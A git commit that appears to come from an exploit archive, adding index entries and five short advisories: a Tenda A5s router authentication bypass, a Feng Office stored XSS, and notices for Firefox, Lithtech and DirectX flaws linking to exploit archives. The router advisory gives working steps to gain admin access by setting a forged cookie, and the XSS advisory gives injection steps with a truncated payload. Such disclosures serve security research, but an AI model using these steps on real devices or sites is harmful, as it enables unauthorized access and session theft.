From 98096fa27639894d3b06b2e9291c8e0da8456d4b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 20 Aug 2014 04:39:23 +0000 Subject: [PATCH] Updated 08_20_2014 --- files.csv | 5 +++++ platforms/hardware/webapps/34361.txt | 27 +++++++++++++++++++++++++++ platforms/linux/remote/34358.txt | 15 +++++++++++++++ platforms/multiple/dos/34360.txt | 7 +++++++ platforms/php/webapps/34277.txt | 20 ++++++++++++++++++++ platforms/windows/dos/34355.txt | 7 +++++++ 6 files changed, 81 insertions(+) create mode 100755 platforms/hardware/webapps/34361.txt create mode 100755 platforms/linux/remote/34358.txt create mode 100755 platforms/multiple/dos/34360.txt create mode 100755 platforms/php/webapps/34277.txt create mode 100755 platforms/windows/dos/34355.txt diff --git a/files.csv b/files.csv index e1c0c9315..1ef216449 100755 --- a/files.csv +++ b/files.csv @@ -30873,6 +30873,7 @@ id,file,description,date,author,platform,type,port 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 +34277,platforms/php/webapps/34277.txt,"Feng Office - Stored XSS",2014-08-06,"Juan Sacco",php,webapps,0 34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0 34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 @@ -30941,6 +30942,10 @@ id,file,description,date,author,platform,type,port 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0 34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0 +34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0 34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 +34358,platforms/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Buffer Overflow Vulnerability",2010-07-20,J23,linux,remote,0 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0 +34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption Vulnerability",2010-07-21,"Luigi Auriemma",multiple,dos,0 +34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability",2014-08-18,zixian,hardware,webapps,80 diff --git a/platforms/hardware/webapps/34361.txt b/platforms/hardware/webapps/34361.txt new file mode 100755 index 000000000..4b46fcece --- /dev/null +++ b/platforms/hardware/webapps/34361.txt @@ -0,0 +1,27 @@ +----------------------------------------------------------------------- + Tenda A5s Router Authentication Bypass Vulnerability +----------------------------------------------------------------------- +Author : zixian +Mail : me@zixian.org +Date : Aug, 17-2014 + +Vendor : http://tenda.com.cn/ +Link : http://tenda.com.cn/Catalog/Product/223 +Version : V3.02.05_CN +CVE : CVE-2014-5246 + +Exploit & p0c +_____________ + +go to + http://192.168.2.1/ + +then set cookie with javascript + + javascript:document.cookie='admin:language=zh-cn' + +go to + http://192.168.2.1/advance.asp + +you are the admin! +_____________ diff --git a/platforms/linux/remote/34358.txt b/platforms/linux/remote/34358.txt new file mode 100755 index 000000000..91dbe1980 --- /dev/null +++ b/platforms/linux/remote/34358.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/41842/info + +Mozilla Firefox and SeaMonkey are prone to a buffer-overflow vulnerability. + +An attacker can exploit this issue by tricking an unsuspecting victim into viewing a page containing malicious content. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the user running the affected application. + +This issue is fixed in: + +Firefox 3.6.7 +Firefox 3.5.11 +SeaMonkey 2.0.6 + +NOTE: This issue was previously covered in BID 41824 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-34 Through -47 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it. + +http://www.exploit-db.com/sploits/34358.zip \ No newline at end of file diff --git a/platforms/multiple/dos/34360.txt b/platforms/multiple/dos/34360.txt new file mode 100755 index 000000000..be5dd6ff3 --- /dev/null +++ b/platforms/multiple/dos/34360.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/41851/info + +Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability. + +An attacker can exploit this issue to cause a denial-of-service condition, or execute arbitrary code within the context of the affected application. Other attacks may also be possible. + +http://www.exploit-db.com/sploits/34360.zip \ No newline at end of file diff --git a/platforms/php/webapps/34277.txt b/platforms/php/webapps/34277.txt new file mode 100755 index 000000000..a26e6c343 --- /dev/null +++ b/platforms/php/webapps/34277.txt @@ -0,0 +1,20 @@ +# Affected software: Feng Office - URL: http://www.fengoffice.com/web/demo.php +# Discovered by: Provensec +# Website: http://www.provensec.com +# Type of vulnerability: XSS Stored +# +# Feng Office is a Collaboration tool that includes a CRM, Communication, +Document Management, Tasks, E-mails, Documents, Internal messages, Time +tracking, +Billing, Calendar, Gantt Charts, Reminders, and more. +# +# Description: Feng Office is prone to a Persistent Cross Site Scripting +attack that allows a malicious user to inject HTML or scripts that can +access any cookies, session tokens, or other +sensitive information retained by your browser and used with that site. +# Proof of concept: +# 1. Create or Edit a client +# 2. Complete the field Name ( customer[name] ) using this value: +"> +# 3. Save changes. +# 4. Share your client in the Activity feed to infect others. \ No newline at end of file diff --git a/platforms/windows/dos/34355.txt b/platforms/windows/dos/34355.txt new file mode 100755 index 000000000..29b9deb4e --- /dev/null +++ b/platforms/windows/dos/34355.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/41794/info + +Microsoft DirectX is prone to multiple denial-of-service vulnerabilities. + +An attacker can exploit these issues to interrupt existing sessions or crash or freeze the application that uses DirectX, resulting in denial-of-service conditions. + +http://www.exploit-db.com/sploits/34355.zip \ No newline at end of file